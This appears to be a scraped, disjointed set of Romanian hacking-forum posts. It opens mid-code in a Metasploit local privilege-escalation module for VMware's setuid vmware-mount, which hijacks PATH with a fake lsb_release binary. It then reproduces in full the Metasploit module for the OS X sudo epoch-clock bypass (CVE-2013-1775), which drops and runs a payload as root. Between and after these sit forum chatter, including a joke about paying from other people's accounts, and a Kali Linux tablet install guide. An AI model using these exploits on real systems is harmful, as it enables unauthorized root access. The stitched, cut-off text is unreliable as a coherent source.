0x80 ; fork # 85C0 test eax,eax # 7406 jz 0xf # 31C0 xor eax,eax # B001 mov al,0x1 # CD80 int 0x80 ; exit exe = generate_payload_exe( :code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded ) write_file("lsb_release", exe) cmd_exec("chmod +x lsb_release") cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount") # Delete it here instead of using FileDropper because the original # session can clean it up cmd_exec("rm -f lsb_release") end def setuid?(remote_file) !!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true") end end Sursa: VMWare Setuid vmware-mount Unsafe popen(3) ? Packet Storm

Da, Intel, cu procesoarele lor CISC (Complex instruction set computing) incearca sa se bage peste ARM, care sunt procesoare RISC (Reduced instruction set computing). Acum problema se pune astfel: putere (Intel) sau consum mic (ARM)? Nu m-ar deranja un Intel Atom pe telefon, insa m-ar deranja ca bateria sa ma tina 2 ore.

Sau cititi asta: Files ? Packet Storm Si faceti cateva plati de pe conturile altora, luati-va o ciocolata

Faceti-le disclosure la alea duplicate. Mai exact, nu cred ca le ia lor 2 ani sa repare un XSS. Deci de multe ori nu cred ca e vorba de vreun duplicat. Ameninta ca il faci public, vezi macar ce zic.

memcpy((void *)(1<<12), &patch_current, 1024);

Scopul chat-ului este ca "discutiile offtopic" sa nu apara pe forum si sa se poarte acolo. Scopul forumului, ceea ce ma intereseaza pe mine, este sa fie curat, iar chat-ul ajuta in aceasta privinta. Cu alte cuvinte, luam 2 masuri: 1. Kabron isi pastreaza neutralitatea morala pe chat, nu face pe seful, nu injura si incearca sa pastreze o decenta in subiectele discutate pe chat. Nu da kick/ban doar pentru ca lui nu ii place un anumit user 2. Matt nu mai posteaza chiar toate lucrurile peste care da si face o selectie rapida: doar exploit-uri in soft-uri foarte cunoscute, nu orice plugin sau soft de care nu a auzit nimeni, doar stiri interesante Iar chat-ul nu se va inchide, indiferent cate mii de voturi veti baga voi pentru inchidere. Daca nu vi se pare util si nu va place, pur si simplu NU INTRATI ACOLO.

Mac OS X Sudo Password Bypass Authored by Todd C. Miller, juan vazquez, joev | Site metasploit.com This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # # http://metasploit.com/ ## require 'shellwords' class Metasploit3 < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use # it at his own risk Rank = NormalRanking include Msf::Post::Common include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper SYSTEMSETUP_PATH = "/usr/sbin/systemsetup" SUDOER_GROUP = "admin" VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']] # saved clock config attr_accessor :time, :date, :networked, :zone, :network_server def initialize(info={}) super(update_info(info, 'Name' => 'Mac OS X Sudo Password Bypass', 'Description' => %q{ This module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the "admin group"), and the user has ever run the "sudo" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This module will fail silently if the user is not an admin or if the user has never run the sudo command. }, 'License' => MSF_LICENSE, 'Author' => [ 'Todd C. Miller', # Vulnerability discovery 'joev <jvennix[at]rapid7.com>', # Metasploit module 'juan vazquez' # testing/fixing module bugs ], 'References' => [ [ 'CVE', '2013-1775' ], [ 'OSVDB', '90677' ], [ 'BID', '58203' ], [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ] ], 'Platform' => 'osx', 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86 } ], [ 'Mac OS X x64 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86_64 } ], [ 'CMD', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 28 2013' )) register_advanced_options([ OptString.new('TMP_FILE', [true,'For the native targets, specifies the path that '+ 'the executable will be dropped on the client machine.', '/tmp/.<random>/<random>'] ), ], self.class) end # ensure target is vulnerable by checking sudo vn and checking # user is in admin group. def check if cmd_exec("sudo -V") =~ /version\s+([^\s]*)\s*$/ sudo_vn = $1 sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i) # check vn between 1.6.0 through 1.7.10p6 # and 1.8.0 through 1.8.6p6 if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) print_error "sudo version #{sudo_vn} not vulnerable." return Exploit::CheckCode::Safe end else print_error "sudo not detected on the system." return Exploit::CheckCode::Safe end if not user_in_admin_group? print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)." Exploit::CheckCode::Safe end # one root for you sir Exploit::CheckCode::Vulnerable end def exploit if not user_in_admin_group? fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.") end # "remember" the current system time/date/network/zone print_good("User is an admin, continuing...") # drop the payload (unless CMD) if using_native_target? cmd_exec("mkdir -p #{File.dirname(drop_path)}") write_file(drop_path, generate_payload_exe) register_files_for_cleanup(drop_path) cmd_exec("chmod +x #{[drop_path].shelljoin}") print_status("Payload dropped and registered for cleanup") end print_status("Saving system clock config...") @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1] @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1] @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/) @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1] @network_server = if @networked cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1] end run_sudo_cmd end def cleanup print_status("Resetting system clock to original values") if @time cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil? cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil? cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil? if @networked cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On") unless @network_server.nil? cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}") end end print_good("Completed clock reset.") if @time end private def run_sudo_cmd print_status("Resetting user's time stamp file and setting clock to the epoch") cmd_exec( "sudo -k; \n"+ "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+ " -setdate 01:01:1970 -settime 00:00" ) # Run Test test = rand_text_alpha(4 + rand(4)) sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ') print_status("Testing that user has sudoed before...") output = cmd_exec('echo "" | ' + sudo_cmd_test) if output =~ /incorrect password attempts\s*$/i fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.") elsif output =~ /#{test}/ print_good("Test executed succesfully. Running payload.") else print_error("Unknown fail while testing, trying to execute the payload anyway...") end # Run Payload sudo_cmd_raw = if using_native_target? ['sudo', '-S', [drop_path].shelljoin].join(' ') elsif using_cmd_target? ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ') end ## to prevent the password prompt from destroying session ## backgrounding the sudo payload in order to keep both sessions usable sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true' print_status "Running command: " print_line sudo_cmd output = cmd_exec(sudo_cmd) end # helper methods for accessing datastore def using_native_target?; target.name =~ /native/i; end def using_cmd_target?; target.name =~ /cmd/i; end def drop_path @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) } end # checks that the user is in OSX's admin group, necessary to change sys clock def user_in_admin_group? cmd_exec("groups `whoami`").split(/\s+/).include?(SUDOER_GROUP) end # helper methods for dealing with sudo's vn num def parse_vn(vn_str); vn_str.split(/[\.p]/).map(&:to_i); end def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']]) vn_parts = parse_vn(vn) ranges.any? do |range| min_parts = parse_vn(range[0]) max_parts = parse_vn(range[1]) vn_parts.all? do |part| min = min_parts.shift max = max_parts.shift (min.nil? or (not part.nil? and part >= min)) and (part.nil? or (not max.nil? and part <= max)) end end end end Sursa: Mac OS X Sudo Password Bypass ? Packet Storm

[h=1]Kali Linux on Galaxy Note 10.1[/h] April 2, 2013 06. Kali Linux ARM Architecture The Samsung Galaxy Note 10.1 is a 10.1-inch tablet computer designed, developed, and marketed by Samsung. The tablet incorporates a 1.4 GHz quad-core Exynos processor and 2 GB of RAM. The touch screen works surprisingly well with Kali as well as the wireless card, however Bluetooth and audio are not yet functional on this image. [h=2]Stock Kali on Galaxy Note 10.1 – Easy Version[/h] If all you want to do is to install Kali on your Galaxy Note 10.1, follow these instructions: You’ll need at least 7 GB free on your internal SD card for our image. Root your Samsung Galaxy Note 10.1 if you have not already done so. Download the Kali Linux Galaxy Note 10.1 image from our downloads area. Rename the downloaded Kali image to linux.img and copy it to /storage/sdcard0. Download our recovery.img file from here and copy it to /storage/sdcard0. Get root on your Galaxy Note 10.1, change /storage/sdcard0, and backup your recovery partition: dd if=/dev/block/mmcblk0p6 of=recovery.img_orig dd the downloaded recovery.img image to the recovery partition: Alert! This process will overwrite your recovery partition. Please make sure you know what you are doing. You may brick your device if you fumble this. dd if=recovery.img of=/dev/block/mmcblk0p6 Reboot your Galaxy Note 10.1 into recovery mode. You can do this by turning it off, then press and hold both the power button and the volume up button. Once you see the “Samsung Galaxy Note 10.1? text appear, release the power button but keep pressing the volume up button. This should boot you into Kali and auto-login into Gnome. The root password is “changeme” (without the quotes!) Open the onscreen keyboard by going to : Applications -> Universal Access -> Florence Virtual Keyboard. Wireless works but seems to skip the scanning of networks without some massaging. If the Gnome Network Manager shows no wireless networks, simply add your wireless network as a “hidden” one and you should get connected as usual. You can modify, debug, and explore our image easily from within your Galaxy Note, using a wonderful Android App called Linux Deploy. Sursa: Kali Linux on Galaxy Note 10.1 | Kali Linux Official Documentation